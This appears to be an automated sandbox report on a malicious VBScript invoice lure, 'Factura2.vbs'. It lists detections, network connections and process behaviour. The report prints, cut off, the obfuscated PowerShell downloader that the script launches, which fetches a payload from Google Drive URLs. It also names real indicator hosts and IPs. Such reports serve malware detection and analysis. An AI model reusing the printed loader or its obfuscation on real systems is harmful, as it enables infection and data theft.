(Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKro

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Factura2.vbsVirustotal: Detection: 16%Perma Link
            Source: unknownHTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbXiz source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbf` source: powershell.exe, 00000005.00000002.2595421485.0000000007B5E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdb source: newfile.exe

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficTCP traffic: 192.168.2.6:49713 -> 114.142.162.17:26
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 114.142.162.17 114.142.162.17
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: powershell.exe, 00000005.00000002.2595421485.0000000007B4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079442238.000001EA79110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 00000000.00000003.2069751324.000001EA79433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186b73
            Source: wscript.exe, 00000000.00000003.2070135793.000001EA79419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPb
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGP
            Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGXR
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download
            Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A95EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49711 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi32_6136.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 5672, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6388
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6388
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6388Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6388Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3489B6112_2_00007FFD3489B611
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3489C3C12_2_00007FFD3489C3C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348960FA2_2_00007FFD348960FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348960902_2_00007FFD34896090
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348967152_2_00007FFD34896715
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34893BFB2_2_00007FFD34893BFB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34896B702_2_00007FFD34896B70
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04F6F2585_2_04F6F258
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04F6FB285_2_04F6FB28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04F6EF105_2_04F6EF10
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07DD9AA85_2_07DD9AA8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00A54AD010_2_00A54AD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00A53EB810_2_00A53EB8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00A5420010_2_00A54200
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00A5F85810_2_00A5F858
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 12_2_00381C5C12_2_00381C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 12_2_003825D312_2_003825D3
            Source: Factura2.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi32_6136.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 5672, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@15/10@4/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Merogastrula.BesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4jeyehg.lfb.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: #v12_2_00381C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: WABOpen12_2_00381C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: #v12_2_00381C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: 5812_2_00383530
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5672
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: Factura2.vbsVirustotal: Detection: 16%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"
